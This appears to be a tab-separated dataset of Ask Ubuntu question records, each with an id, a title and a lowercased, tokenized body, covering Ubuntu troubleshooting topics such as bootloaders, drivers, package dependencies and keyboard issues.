522692	full screen mode under kde with any window	i found my new favorite shortcut ( under kubuntu 14.04 ) ctrl+shift+f which brings applications like okular or kate to full screen . unfortunately it does not work with konsole , chrome , etc . which brings me to the question : why , and how to do it anyway ?
522694	separating images from text in a scanned pdf document	regular pdf files consist of vector elements , such as text and vector graphics , and other embedded data , such as image files . extracting the latter is quite easy with utilities such as pdfimages ( as described in this q & a ) . on the other hand , scanned pdf documents are compilations of scanned pages . every single page is a bitmap image , possibly overlayed with a searchable text layer produced by ocr . as a result , running pdfimages on a scanned pdf document will merely extract the scanned pages . what i am looking for is an application or command-line utility that can distinguish between images and text in a scanned pdf document and extract the former . does anything like this exist ?
522695	python gui frameworks that support touch devices	hello everyone i want to know what is the best gui framework for python that supports touch i 've been searching couple of hours and this are results which i found : pyqt5 i heard for qt and i know it supports touch screen devices but i was searching for reviews about pyqt5 ( 5.2 ) support for touch devices and did n't found anything specific . kivy i found out about kivy 10 minutes ago i watched some videos , read their documentation and i was really impressed . pygtk3 i found on wiki that version 3 supports touch devices but i wanted to confirm that and did n't found anything specific too . i want to hear your opinion esspecially i need to know which of those solution is best to combine with gstreamer framework .
522697	unable to boot ubuntu using bootable pen drive on lenovo g50-70	i am unable to boot ubuntu pen drive on lenovo g50-70 model . i tried to boot the pen drive on one of my friens=ds pc and it worked . i tried by disabling secure boot , fast boot option and set the option to boot from legacy mode first but still no luck with it . it boots up with window manager only .
522701	how to install lexmark x1250 driver on ubuntu 14.04	i am total biginer on linux and i need step by step exsemple how to install drivers for lexmark x1250 on ubuntu 14.04 .
522702	nightly 14.10 build thinks i am a phone	the latest nightly build , when running as a live system on my lenovo x1 carbon , thinks that it is running on a phone . there are almost no apps , and in the system settings , there is an `` about this phone '' option . is this because the laptop has a touch screen ? can i make it just run a normal ubuntu system instead , please ? i want to give wayland/mir a spin .
522703	i m not able to download apache2-prefork-dev	i m using ubuntu12.04 i use command : sudo apt-get install apache2-prefork-dev error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : apache2-prefork-dev : depends : libaprutil1-dev but it is not going to be installed e : broken packages
522705	sandstrom wireless mouse	i 've just bought a sandstrom wireless mouse ( usb ) and it 's playing up on my ubuntu 14.04 system . after about 2 minutes of use the pointer freezes as i move the mouse across the screen - only for a few seconds , but it makes the thing damn near unusable ! the mouse works fine on my macbook pro so i 'm wondering if there is a way to tweak the configuration ( perhaps using xinput ? ) . anyone have one of these mice and experiencing similar problems ? thanks marty
522707	open nat too xbox from android via connection sharing	first i know there are similar questions that get closed as off topic but mine is slightly different . xbox live complains about strict nat setting when i use a android tether and connection sharing via ethernet . i found a fix for this in windows without modifying any thing on the android device and just configuring the windows network manager , however window network share sucks and i would like to achieve the same result but on ubuntu . i hope if i only configure the ubuntu network manager this makes my question valid and wo n't it wo n't get closed . my set up is usb0 is my internet connection and eth0 is shared to the xbox here 's the windows tutorial , please help me convert it too ubuntu , thanks http : //forum.xda-developers.com/showthread.php ? t=1618279 i am not sure that this will work with every tethering service out there , but i am officially announcing that i have obtained an open nat on xbl . for over a year now i have looked all over the internet trying to find a way to get my nat open and finally i have done it . i did this by internet connection sharing ( via a ethernet `` crossover '' cable fro pc to xbox ) . also i find that open garden works a helluva lot better than android wifi tether . enable wifi tethering on your device connect pc to wireless signal open network and sharing center ( start/control panel/ network and internet/network and sharing center ) click change adapter settings right click on your shared internet connection ( in this case should be your wifi connection ) , select properties , sharing tab , check : allow other network users to control or disable the shared internet connection . stay on the sharing tab and click settings , uncheck everything under settings , now click add : description of service- xbox1 name or ip address of the computer hosting this service on your network : ( name of your comp ) external port : tcp 53 internal port : tcp 53 description of service : xbox 2 name of ip address of the computer hosting this service on your network : external port : udp 53 internal port : udp 53 description of service : xbox 3 name of ip address of the computer hosting this service on your network : external port : udp 88 internal port : udp 88 description of service : xbox 4 name of ip address of the computer hosting this service on your network : external port : tcp 3074 internal port : tcp 3074 description of service : xbox 5 name of ip address of the computer hosting this service on your network : external port : udp 3074 internal port : udp 3074 follow these steps and i promise that you will get an open nat
522711	optimal ubuntu version for nas with xbmc ?	in my combined nas and media center solution , i have currently xbmc installed on a ubuntu desktop 12.04 . while generally functional , xbmc sometimes crashes and i ca n't but help that ubuntu desktop is overkill in this situation . basically , the only graphical interface i need is xbmc , the rest ( afp , time machine setup , management in general etc ) i administer through ssh or sometimes webmin . so my question is , as the title suggest : what would be the optimal ubuntu version for a nas with xbmc ? ( my interpretation of 'optimal ' : i want the video rendering to be as good as possible , and i want the system to be as stable as possible . ) hardware : intel atom d525 cpu & nvidia ion 512mb ddr3 gpu .
522712	undo apt-get remove -- purge	i wanted a fresh install of python and ran sudo apt-get remove -- purge python . apparently it has killed almost everything i had installed in my system . looking at the history.log i guess i could manually install the packages again , but there are hundreds of them , i ca n't just copy paste . ironically , python is still installed . could i perform some replace regex with it so i can fix this mess ? or with bash .
522714	unable to telnet my switch	when i 'm trying to telnet my switch with its management ip its showing following error what to do ? escape character is '^ ] ' . authentication failed ! connection closed by foreign host .
522715	problem installing gephi after installing ppa and oracle java 8	i have been having some issues with installing gephi recently on trusty . the following are in my repository : http : //ppa.launchpad.net/rockclimb/gephi-testing/ubuntu trusty main http : //ppa.launchpad.net/webupd8team/java/ubuntu trusty main when i sudo apt-get install gephi i get the following packages have unmet dependencies : gephi : depends : libgoogle-collections-java but it is not installable when i tried to look for the package , it says that the repo is no longer being updated . i then managed to find an old copy of the package here : https : //packages.debian.org/source/wheezy/libgoogle-collections-java but for some reason when i tried to install it using : tar -zxvf 'tarball' nothing seems to be happening . does anyone know what i am missing ?
522721	juju charmstore server install failed	i want to install juju charm store in local machine.after i installing charm-store ( https : //github.com/juju/charmstore ) i retrieve some charms from public repository using charmload cmd/charmd/config.yaml so i can see 28 charms in mongodb . so after i installing charm-store server it starts 8080 port.but i ca n't see any charm info.it means when i browse /charm-info or /charm-event or /charm/ it gives empty value.i ca n't find out where is the error.i have installed mongodb.it always gives empty brackets { } .so can anyone tell me how to check logs or what happened here .
522723	display all unicode characters	when i open 'character map ' , not all characters are displayed . for example in script 'balinese ' the first character is displayed like this : __ |1b| |00| but i want the real character , of course . do i lack fonts ? if so is there a meta package ? additional details : ubuntu 14.04 lts
522725	under which extension does photorec search for .tex file	under which extension does photorec search for .tex file ? i can not run the command fidentity using terminal . so does anybody know of that ? thanks a lot !
522727	i ca n't use proprietary drivers for amd 8970m ( 14.04 )	i have checked in the additional drivers section but it says i am using manual drivers . i try clicking on trying to use the proprietary drivers but cant select that option . i have tried : sudo apt-get install xserver-xorg-video-radeon sudo apt-get update sudo apt-get upgrade errors were encountered while processing : /var/cache/apt/archives/fglrx-updates_2 % 3a13.350.1-0ubuntu2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ^^ error from > > sudo apt-get -f install i also tried installing catalyst from the amd website but it says a previous version of fglrx is installed even though it is not . help please
522728	rename of multiple files by command or software	i have many files for that i want to rename them . current name : 5b011351286e8a042b23ffff\5b011351286e8a042b23ffff_130225_145634.xml required name : 5b011351286e8a042b23ffff_130225_145634.xml i just want to delete the part before the backslash and the forward slash as well . i have 500 files for which i want to do same .
522732	ubuntu 14.04 startup problems after booting to windows - end trace	i have a hp 8570w laptop , which has windows 7 and ubuntu 14.04 lts dual booted . the problem is that after iâ´ve used windows and then boot ubuntu it gets stuck as shown in the picture . when i forcefully shutdown the laptop and then restart to ubuntu everything works fine , until i use windows again . any ideas ? http : //i.stack.imgur.com/hatzo.jpg
522733	update ubuntu 's unity design	i 'm doing a project which is updating the design of ubuntu 14.04 to current design concepts ( flat and minimalist design ) . first i would like to give me your opinion if i 'm on the right track , or should change direction . secondly i would like information on how to make this project a reality ; ie not have sufficient knowledge or find google to learn how to create a theme for ubuntu from 0 . can anyone please provide me information ? . as i still have enough reputation to post images , i leave the link to the first part of the project on my blog . http : //www.re-design.es/redisenando-ubuntu-14-04-lts/ i hope your answer , thank you for everything and best regards .
522735	ca n't update ubuntu 14.4	i cant update my ubuntu 14.4. showing the below error . w : failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
522736	eifdisk read error	today suddenly when i returned from my trip and the device was connected to charger all that time when i woke it up it gave me this statement after toshiba logo immediately '' eifdisk read error `` and after this i get grub > _ to write command i have ubuntu 14.3 and win 8 is there any way to get around this without cds or flashes ?
522743	i deleted ubuntu partition and my laptop it was showing grub rescue screen	i deleted ubuntu directly from drive by deleting partition option . on restarting my laptop it was showing grub rescue screen , which i did n't knew what to do . i went to bios and i changed some settings and now when i am restarting my laptop its loving bios straight away . tell me what to do now . manufacturer : asus k55vm windows 8
522745	unaible to connect my samsung s4 to linux mint	i 'm a new user of linux mint 13 xfce maya because windows xp is n't supported anymore . it 's nice to work in linux and it opened up a new world for me , but i still have much to learn ! i wanted to connect my samsung galaxy s4 using my usb cable . in windows this was easy , i just connected the usb from my phone to my laptop and i could see my phone in `` my computer '' as a storage device . however , i 've tried to do the same with linux , but linux does n't respond . my phone is unrecongisable . i know i can try to connect with kies air , but that 's not the question ... i want it to work with my usb cable . my phone is already rooted , and usb debugging is enabled . can anyone please help me ? ?
522746	how to change gcc-4.9-base version without removing dependecies ?	i have a freshly installed ubuntu 14.04.1 but can not install nvidia-331 driver because of dependencies conflict : lib32gcc1 should be installed but it conflicts with already installed gcc-4.9-base ( 4.9.1-0ubuntu1 ) , it requires gcc-4.9-base ( 4.9-20140406-0ubuntu1 ) . when i change the gcc-4.9-base version it removes almost all the rest packages like account* , gnome* , lib* , ubuntu* , unity* , xserver* , etc . will i be able to safely remove them without system re-installation ? or is there another way of resolving conflict of nvidia-331 ? p.s . my ubuntu has been packed with ua-linux team and includes their repositories archive.ualinux.com
522751	grub rescue error no such partition	i accidently format my drive on which ubuntu was installed . now at the boot time it directly gives an error no partition grub rescue . i can not istall any os from my bootable usb drive . so anyone can give me a real solution for it . thanks in advance
522752	where is the vimtutor located	where is this text tutor ? i keep finding references to it but only get an empty document when i run it .
522753	ubuntu 14.04 videos and games running slow	i have little problem with ubuntu here . i was running windows 8 and then i decide to make dual boot with ubuntu 14.04 ( whitch is great system ! ) but when i boot to ubuntu i have problems with system performance ! for example , youtube videos in mozilla firefox are slow , games for linux are running with low fps and playonlinux is always unplayable ! can anybody help me and respond to me what can i do ? i have dual core cpu amd with 1,6 ghz ( x2 ) , 6 gb ram , graphics card radeon hd 6310m and about 700 gb hardisk . i think problem is my gpu ... anybody know good and stable driver for that card ? thank you soo much for any answers !
522754	about ubuntu phone releasing date	now iphone 6 has released . i was planning to buy a new phone this year . but i am waiting for your phone . but there is not any exact date of releasing of your phone . so plz convey the date to us , so that we can wait for that definite period of time .
522759	is there an easy way to find out temperature components are running at in 14.04 ?	the title of the question says it all really . i have a new laptop with ubuntu 14.04 installed . there appears to be an overheating problem which fortunately does not appear to be affecting performance . i suspect it is my nvidia geforce card , even though i have bumblebee installed . in essence what i am looking for is a way , either via terminal or an app , to monitor the temperature of components so as to definably find out what may be overheating .
522762	adding user in the image ( using ubuntu customization kit )	i am using ubuntu customization kit to customize ubuntu 12.04 . i created a user by # useradd command at the time of creating image and bundled it . after installing that bundled os it shows that user but unable to login , giving the password it again returns to the login screen . can someone let me know correct way of adding a user in that image and bundle it .
522763	unity binding special keys to script or shortcut	i want execute a script shell when i press special keys on my laptop ( dell xps 12 ) . the problem is that the three keys are using variants events depending on key down/up . showkey -- scancodes tell me this informations : # super left key 0xe0 0x5b # key down 0xe0 0xdb # key up # special key 1 0xe0 0x5b 0xe0 0xdb # key down - # key up # special key 2 - # key down 0xe0 0x5b 0xe0 0xdb # key up is there a way to bind these key down or key up events to an action ?
522765	how to install okular on ubuntu 12.04	can some please let me how to install okular on ubuntu 12.04 and also kparts plugin by command prompt or if you can please let me know any ppa 's to install it already tried sudo apt-add-repository ppa : kubuntu-ppa/backports sudo apt-add-repository ppa : kalakris/okular sudo apt-get update sudo apt-get install okular the following packages have unmet dependencies : okular : depends : libkio5 but it is not going to be installed depends : libkparts4 but it is not going to be installed depends : libkprintutils4 but it is not going to be installed depends : libokularcore4 ( = 4:4.13.2-0ubuntu0.1~ubuntu12.04~ppa1 ) but it is not going to be installed depends : libphonon4 ( > = 4:4.7.0really4.3.80 ) but it is not installable depends : libpoppler-qt4-3 ( > = 0.18 ) but it is not installable depends : libqca2 ( > = 2.0.2 ) but it is not installable depends : libqimageblitz4 ( > = 1:0.0.4 ) but it is not installable depends : phonon but it is not installable e : unable to correct problems , you have held broken packages . let me know what needs to be done . thanks in advance .
522768	some random keys do n't work	i just installed ubuntu 14.04 lts on my new freedos laptop ( lenovo z50 ) . after installation i did a full software update with 'software updater ' und restarted the laptop . right now i 'm installing drivers for my graphic card . but since i installed ubuntu some of my keys do n't work , for example the backspace key , t , and the capslock-key . how do i fix this ? i did try an usb-keyboard and there are no problems ... just the laptop keys seem to have this problem .
522771	ssh connection time out ubunto 14.04	i get connection timeout after ssh hnname so i try the follow : netstat -nltp - i see that there is no process listen on port 22 sudo service ssh restart - i see that there is no process listen on port 22 sudo ufw allow 22/tcp + service ssh restart - i try to connect by ssh hnname and i still get connection timeout i really appreciate your help thanks
522773	configuring ubuntu virtual machine network - behind proxy firewall	i have created a ubuntu virtual machine on windows 7 but not able to connect to internet . is it possible to provide the specific settings required to configure internet connections
522775	replace the customized configuration file '/etc/sysctl.conf ' ? ubuntu upgrade from 13.10 to 14.04	i 'm upgrading ubuntu from 13.10 to 14.04 , during the upgrade it is asking the following question : replace the customized configuration file '/etc/sysctl.conf ' ? you will lose any changes made to this configuration file if you choose to replace it with the newer version . difference between the files : -- - /etc/sysctl.conf 2014-04-21 21:38:34.970070205 +0530 +++ /etc/sysctl.conf.dpkg-new 2013-04-01 07:55:31.000000000 +0530 @ @ -1,6 +1,6 @ @ # # /etc/sysctl.conf - configuration file for setting system variables - # see /etc/sysctl.d/ for additional system variables + # see /etc/sysctl.d/ for additional system variables . # see sysctl.conf ( 5 ) for information . # @ @ -58,7 +58,3 @ @ # log martian packets # net.ipv4.conf.all.log_martians = 1 # - # disable ipv6 -net.ipv6.conf.all.disable_ipv6 = 1 -net.ipv6.conf.default.disable_ipv6 = 1 -net.ipv6.conf.lo.disable_ipv6 = 1 i do n't understand what this means , i tried googling for an answer but every post has a different file name for the same question and the answers are varying . should i keep the file or replace it ?
522780	why wont my computer ( ubuntu 14.04 ) print via laser jet p1102	i have an hp laserjet p1102 , it is recognized by my computer ( ubuntu 14.04 ) , i printed a test page and it worked fine , so i moved on to printing my document , but ... it does n't . i 'm rather ignorant as to how these things operate.. what do i need to do ?
522781	unknown floppy drive detected	after a reboot , ubuntu ( and windows ) detect an external floppy drive that is n't even there ! it 's not a big problem to find a new floppy drive that i ca n't access , but it really looks strange in the file manager . this drive is recognized as /dev/fd0 , i wa n't to know how can i force ubuntu to re-detect each connected device and get rid of this strange issue as quickly as possible . thanks ..
522783	machine design softwares for ubuntu	is design machine soft wares like solid works and uni graphics is available for ubuntu or the same software used in windows can be run in this os ?
522785	grub doesnt boot usb	i had a computer with windows 7 and ubuntu 14.04 . i decided to remove windows 7 but i 've done something wrong up and formatted the entire hard disk , and now i have no os . i tried to boot from my usb where i have ubuntu to install it again , but even if in the bios the primary device is usb , it doesnt start automatically and i get this message : error : unknown filesystem entering rescue mode ... grub rescue > what should i do ? i already tried to boot manually from the boot menu but nothing .
522786	remmina to rdp to our active directory	ca n't rdp to our active directory after it renewed its certificate . i removed the remmina.pref file , but without luck . what remmina asks for is accepting the cert and fingerprint first time it connects to a remote agent . i assume it then stores that info , although there is nothing that can be found in directory .remmina other than the pref file . i want to remove any old traces of the active directory cert , so it will ask me for the newest certificate and generate me a new fingerprint .
522787	why do ext2 and successors not need defragmentation ?	the ext2/ext3/ext4 filesystem family does not need defragmentation . what underlying design help this filesystem in not getting fragmented ?
522792	when i open a terminal and type set i get a strange output	i opened a terminal on the desktop in xubuntu and typed set and then a new line . i aws expecting to see a display of my environmental variables , but all i got was a display of a lot of code . what on earth is going on ? here 's a bit of that code pactl ( ) { local cur prev words cword preprev command ; local comps ; local flags='-h -- help -- version -s -- server= -- client-name= ' ; local list_types='short sinks sources sink-inputs source outputs cards modules samples clients ' ; local commands= ( stat info list exit upload-sample play-sample remove-sample load-module unload-module move-sink-input move-source-output suspend-sink suspend-source set-card-profile set-sink-port set-source-port set-sink-volume set-source-volume set-sink-input-volume set-source-output-volume set-sink-mute set-source-mute set-sink-input-mute set-source-output-mute set-sink-formats set-port-latency-offset subscribe help ) ; _init_completion -n = || return ; preprev= $ { words [ $ cword-2 ] } ; for word in `` $ { comp_words [ @ ] } '' ; do if in_array `` $ word '' `` $ { commands [ @ ] } '' ; then command= $ word ; break ; fi ; done ; case $ preprev in list ) compreply= ( $ ( compgen -w 'short ' -- `` $ cur '' ) ) ; ; play-sample ) comps= $ ( __sinks ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; move-sink-input ) comps= $ ( __sinks ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; move-source-output ) comps= $ ( __sources ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; set-card-profile ) comps= $ ( __profiles ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; set-*-port ) comps= $ ( __ports ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; set-*-mute ) compreply= ( $ ( compgen -w 'true false toggle ' -- `` $ cur '' ) ) ; ; set-sink-formats ) ; ; set-port-* ) comps= $ ( __ports ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; -- server ) compopt +o nospace ; _known_hosts_real `` $ cur '' ; ; esac ; [ [ -n $ compreply ] ] & & return 0 ; case $ prev in list ) compreply= ( $ ( compgen -w ' $ { list_types [ * ] } ' -- `` $ cur '' ) ) ; ; stat ) compreply= ( $ ( compgen -w 'short ' -- `` $ cur '' ) ) ; ; upload-sample ) _filedir ; ; play-sample ) ; ; remove-sample ) ; ; load-module ) comps= $ ( __all_modules ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; unload-module ) comps= $ ( __loaded_modules ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; set-card* ) comps= $ ( __cards ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; *sink-input* ) comps= $ ( __sink_inputs ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; *source-output* ) comps= $ ( __source_outputs ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; set-sink-formats ) comps= $ ( __sinks_idx ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; *sink* ) comps= $ ( __sinks ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; *source* ) comps= $ ( __sources ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; set-port* ) comps= $ ( __cards ) ; compreply= ( $ ( compgen -w ' $ { comps [ * ] } ' -- `` $ cur '' ) ) ; ; -s ) _known_hosts_real `` $ cur '' ; ; esac ; [ [ -n $ compreply ] ] & & return 0 ; case $ cur in -- server=* ) cur= $ { cur # *= } ; _known_hosts_real `` $ cur '' ; ; -* ) compreply= ( $ ( compgen -w ' $ { flags [ * ] } ' -- `` $ cur '' ) ) ; [ [ $ compreply == *= ] ] & & compopt -o nospace ; ; * ) [ [ -z $ command ] ] & & compreply= ( $ ( compgen -w ' $ { commands [ * ] } ' -- `` $ cur '' ) ) ; ; esac }
522793	i do n't know what went wrong during the installation of my conky , maybe you could help me	so today i reinstalled my conky ( theme ) , but something went wrong or i do n't know . i 'm using harmattan conky . it has 4 modes and till today i used one which only showed the weather . today i wanted to check out another mode which you can see on the image below , but as you can see it 's `` broken '' . do you have any idea how to solve it ? i tried to move it hoping that it will auto-repair/correct itself but nothing .
522796	is there alternative program for read text attributes ( family , color , size etc . ) from psd format in linux ubuntu ?	gimp is wonderful tool but in all its ' greatness psd format full compatibility for text is missing . that is , text layers become rasterized upon import . i 've found out that this is because lack of documentation on psd format ( doc closed for several years ) and not payed development of gimp ( or other alternatives ) . currently i 'm using trial version of photoshop on a different machine ... which is not the best way to work . i need only to read attributes of text ( font family , size , color + maybe letter spacing etc . ) from psd format , all the rest i can do at mighty gimp . precisely i am making a website template out of project saved in psd format . i have special fonts that were used .
522798	how can i see the bugs open for different versions ?	where can i see the criticals bugs for ubuntu versions ? for example ( this information is merely an example from my head not the reality ) : - 14.04 300 bugs ( 100 critical ) - 14.10 ( after official released ) 600 bugs ( 200 critical ) ? the reason i ask is because i want to be sure before upgrading to an non lts that major bugs are fixed . for the lts upgrades , there is the 3 month before the first point release . for the non lts there is no point releases .
522799	running ubuntu on asus ux303la	i 've been looking for a laptop for school and stumbled across the asus ux303la since lenovo does n't bother using decent displays in their beginner to semi-professional thinkpads . i 'm probably getting this configuration . ( i5-4210u , 500gb hdd , intel graphics 4400hd,13.3 '' 1600 x 900 ) i heard from several people that ubuntu works out-of-the-box on the antecessor ux32la without major problems . ( only things like brightness control need a little hand work ) . but i 'm not sure about the compatibility of the ux303la . i want to run windows 7/8 along with ubuntu 14.04.1 lts and do mostly programming ( webdesign ) and browsing , no gaming or video editing and therefore no external graphics needed ( maybe a little photoshop or gimp but i think the intel graphics will be sufficent ) . most important for me is the low weight and the long runtime . my second choice would have been the lenovo thinkpad s440 but the awful screen keeps me from buying it . i chose the 500gb model of the asus so i could exchange the hdd with a cheap 256gb ssd . if anyone had experience with ubuntu on this laptop or suggestions for similar laptops which you would recommend instead i 'd be very grateful . ( please consider that i live in germany and therefore would prefer laptops available in europe )
522801	`` home '' key disabled after upgrading to ubuntu 14.04	i have noticed that after upgrading to ubuntu 14.04 64bit from the previous version 12.10 , the `` home '' key is not functional anymore . the same problem is for `` pageup '' key . i 'm using an asus s56c laptop . running showkey as root does not detect any event when pressing home , pageup or keys 7 and 9 from the numeric lock . is there any solution to fix this problem as it 's really frustrating ?
522805	ubuntu gnome and application icon in top bar ?	when i install application that add icon in top bar , i do n't see anything in top bar . is gnome shell restricts iconns ? how can i change it to let application icon to be added there ?
522806	usb modem connected and internet connection is also working but network maneger shows modem is not connected	i have installed my usb modem driver software . and its works fine . whenever i click on connect button of my modem 's software , it connects with internet and i can work with my browser and terminal . but my my network maneger says that modem isnt connected . even it shows that my realtelk network card is also disconnected . thats why i cant even install app from the software centre . i have to install apps by terminal . is there any solution for my problem ?
522807	how to freeze recording mixer levels ?	i 'm using google hangouts plugin for chromium for video calls , but this program thinks that it is smarter than me and regularry drops recording mic level to very low values ( and my companion complains that can not hear me well ) , and i 'm even ca n't raise recording level back to acceptable values - it 's instantly being dropped down . how can i explain this stupid program that i am the chief here , and if i set the recording level high - it must be high ? tried to chmod 444 /dev/snd/controlc0 - all sound was muted after this until chmod 664 /dev/snd/controlc0 back . thank you .
522808	startup disk creator wo n't add new files	i attempted to use the startup disk creator to write an image to an sd card for my raspberry pi . so now when i try to use the startup disk creator , the path to the source of the image/iso file is still set to the image for the pi . when i attempt to change it and queue the ubuntu iso to write to my flash drive , it wo n't set and it is stuck on the path to the image for the pi . i 've remove the program and re-installed it to no effect . am i missing something ? how do i clear the settings and truly have a fresh install of the startup disk creator . thanks
522811	how can i get my bluetooth to work on my lenovo g770 ?	bluetooth is not working , please help .
522812	init.d script does n't log to /var/log/boot.log	the script below is working fine at system startup . however , its log messages do n't show in /var/log/boot.log , when the system boots . i compared it with other init.d scripts and could n't reach any conclusion as to what i am missing . when i execute it via sudo service start|stop|restart command line , the expected messages show up in the terminal output . what should i have to do to get the log messages from this script into /var/log/boot.log without pipeling its output to the log file , just by using /lib/lsb/init-functions ? i 'm on ubuntu 14.04 lts . below is the script and runlevel configuration . the script ( name : rtorrent ) # ! /bin/bash # # # begin init info # provides : rtorrent # required-start : $ syslog $ local_fs # required-stop : $ syslog $ local_fs # should-start : $ remote_fs # should-stop : $ remote_fs # x-start-before : xdm kdm gdm ldm sdm # default-start : 2 3 4 5 # default-stop : 0 1 6 # short-description : rtorrent # description : load up rtorrent in a screen session and pirate away # # # end init info # # # # # # # # # # # # # # # # # to install run # sudo /usr/sbin/update-rc.d rtorrent defaults # to see script output # cat /var/log/boot.log # # # # # # # # # # # # # # # # # # # . /lib/lsb/init-functions # edit this variable to the user that you want rtorrent to run as user= < myuserid > case `` $ 1 '' in start ) log_daemon_msg `` starting rtorrent '' if [ -f /home/ $ user/rtorrent/.session/rtorrent.lock ] ; then su $ user -c 'rm -f /home/ $ user/rtorrent/.session/rtorrent.lock ' & > /dev/null fi su $ user -c 'screen -d -m -s rtorrent rtorrent ' & > /dev/null if [ $ ? -gt 0 ] ; then log_failure_msg `` failed . '' log_end_msg 1 exit 0 else log_end_msg 0 fi ; ; stop ) log_daemon_msg `` stopping rtorrent '' killall -w -s 2 /usr/local/bin/rtorrent & > /dev/null if [ $ ? -gt 0 ] ; then log_failure_msg `` failed . '' log_end_msg 1 else log_end_msg 0 fi ; ; restart ) $ 0 stop sleep 3 $ 0 start ; ; * ) echo `` usage : $ 0 { start|stop|restart } '' esac exit 0 runlevel configuration rc.local rc0.d : k02vmguest k09apache2 k10unattended-upgrades k20bandwidthd k20btsync k20osspd k20rtorrent k20speech-dispatcher k20transmission-daemon k20vboxautostart-service k20vboxballoonctrl-service k20vboxdrv k20vboxweb-service k20virtualbox readme s20sendsigs s30urandom s31umountnfs.sh s35networking s40umountfs s60umountroot s90halt rc1.d : k02vmguest k09apache2 k20acpi-support k20bandwidthd k20btsync k20kerneloops k20osspd k20rtorrent k20saned k20snmpd k20speech-dispatcher k20transmission-daemon k20vboxautostart-service k20vboxballoonctrl-service k20vboxdrv k20vboxweb-service k20virtualbox readme s30killprocs s70dns-clean s70pppd-dns s90single rc2.d : readme s20bandwidthd s20btsync s20kerneloops s20osspd s20snmpd s20speech-dispatcher s20transmission-daemon s20vboxautostart-service s20vboxballoonctrl-service s20vboxdrv s20vboxweb-service s20virtualbox s50rsync s50saned s70dns-clean s70pppd-dns s75sudo s80rtorrent s91apache2 s98vmguest s99acpi-support s99grub-common s99ondemand s99rc.local rc3.d : readme s20bandwidthd s20btsync s20kerneloops s20osspd s20snmpd s20speech-dispatcher s20transmission-daemon s20vboxautostart-service s20vboxballoonctrl-service s20vboxdrv s20vboxweb-service s20virtualbox s50rsync s50saned s70dns-clean s70pppd-dns s75sudo s80rtorrent s91apache2 s98vmguest s99acpi-support s99grub-common s99ondemand s99rc.local rc4.d : readme s20bandwidthd s20btsync s20kerneloops s20osspd s20snmpd s20speech-dispatcher s20transmission-daemon s20vboxautostart-service s20vboxballoonctrl-service s20vboxdrv s20vboxweb-service s20virtualbox s50rsync s50saned s70dns-clean s70pppd-dns s75sudo s80rtorrent s91apache2 s98vmguest s99acpi-support s99grub-common s99ondemand s99rc.local rc5.d : readme s20bandwidthd s20btsync s20kerneloops s20osspd s20snmpd s20speech-dispatcher s20transmission-daemon s20vboxautostart-service s20vboxballoonctrl-service s20vboxdrv s20vboxweb-service s20virtualbox s50rsync s50saned s70dns-clean s70pppd-dns s75sudo s80rtorrent s91apache2 s98vmguest s99acpi-support s99grub-common s99ondemand s99rc.local rc6.d : k02vmguest k09apache2 k10unattended-upgrades k20bandwidthd k20btsync k20osspd k20rtorrent k20speech-dispatcher k20transmission-daemon k20vboxautostart-service k20vboxballoonctrl-service k20vboxdrv k20vboxweb-service k20virtualbox readme s20sendsigs s30urandom s31umountnfs.sh s35networking s40umountfs s60umountroot s90reboot rcs.d : readme s25brltty s37apparmor s47lm-sensors s55urandom s70x11-common
522816	how do i find the size of ubuntu 14.04 befor installation ?	how do i find the size of a fresh ubuntu 14.04 installation with nothing at all added to it before actually installing it ? for example i install ubuntu 14.04 and select absolutely nothing and by nothing i mean no desktop environment , software , or anything else excluding the base system that is absolutely required . so how would i find the size of that installation before i install it ? i ask this question as i am going to install ubuntu 14.04 on a computer with very limited hard drive space and i would like to be sure that everything will fit on the computer before i go ahead and install it . i am working with a 6gb hard drive .
522820	could not login ubuntu 13.10 after remove libimobiledevice and all dependencies	i installed libimobiledevice 1.1.6 and it doe n't work after that i remove it from software mamager to install 1.1.7 version and i have to remove all it 's dependency libs , i loged out and now when i enter my password on login page nothing happen : / please help me thanks in advance
522825	create .desktop files via gui	i used mint for a long time and we have an option to add launchers to the desktop on mint . since i 've shifted to ubuntu for now , this has seem to become such an annoying task , to create .desktop files manually . is n't there a proper gui method that works for 14.04 ? most of the results returned are for ubuntu 11.10 and most of them do n't work
522827	grub did n't rewrite windows 7 loader	i have installed win7 and now i want to install linux mint 17 as the second os . but after installing linux mint 17 grub never starts and win7 starts automatically . what i need to do for installing grub ?
